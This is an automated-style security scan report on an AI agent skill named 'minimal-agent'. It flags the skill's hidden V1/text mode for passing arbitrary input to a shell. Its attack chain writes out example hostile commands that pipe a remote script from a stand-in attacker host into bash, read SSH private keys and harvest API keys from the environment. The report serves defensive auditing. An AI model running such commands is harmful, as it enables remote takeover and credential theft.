Scan Report
75 /100
minimal-agent
极简 AI 操作系统控制代理(声称)- 实际提供无限制命令执行
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
Do not install this skill
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.
Attack Chain 7 steps
⬡
Escalation Skill marketed as minimal OS control agent with window management and hardware control
SKILL.md:1⬡
Escalation V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution
SKILL.md:65⬡
Escalation Attacker forces V1 mode via --text flag or config mode='force_text'
scripts/agent.py:444⬡
Escalation execute_raw_command() passes arbitrary input to shell=True subprocess
scripts/agent.py:459◉
Impact Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell
scripts/agent.py:459◉
Impact Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys
scripts/agent.py:459◉
Impact Attacker executes: 'env | grep API' to harvest credentials
scripts/agent.py:459Findings 6 items
| Severity | Finding | Location |
|---|---|---|
| Critical | Unrestricted Arbitrary Command Execution via V1 Mode RCE | scripts/agent.py:459 |
| Critical | Documentation Mismatch: Claims Minimal Control But Enables Full System Access Doc Mismatch | SKILL.md:67 |
| High | Direct Shell Injection via User Input RCE | scripts/agent.py:459 |
| High | Undeclared Elevated Permissions Priv Escalation | SKILL.md:87 |
| Medium | Python venv Path Hardcoded with User Home Directory Obfuscation | scripts/agent.py:114 |
| Medium | Potential Environment Variable Access for API Keys Credential Theft | scripts/agent.py:459 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Shell | WRITE | WRITE | ✓ Aligned | agent.py:run_script() uses subprocess |
| Filesystem | WRITE | WRITE | ✓ Aligned | agent.py + V1 mode enables any file operation |
| Network | READ | READ_WRITE | ✗ Violation | |
| Database | NONE | WRITE | ✗ Violation | |
| Environment | NONE | READ | ✗ Violation | |
| Skill Invoke | NONE | WRITE | ✗ Violation |
3 findings
Medium External URL 外部 URL
https://skillhub.tencent.com/skills/system-controller SKILL.md:262 Medium External URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller SKILL.md:271 Medium External URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip SKILL.md:275 File Tree
3 files · 49.5 KB · 1255 lines Python 1f · 938L
Markdown 1f · 293L
TOML 1f · 24L
├─
▾
scripts
│ ├─
agent.py
Python
│ └─
config.toml
TOML
└─
SKILL.md
Markdown
Dependencies 2 items
| Package | Version | Source | Known Vulns | Notes |
|---|---|---|---|---|
subprocess | stdlib | Python | No | Standard library only |
tomllib | stdlib | Python | No | Standard library only |
Security Positives
✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution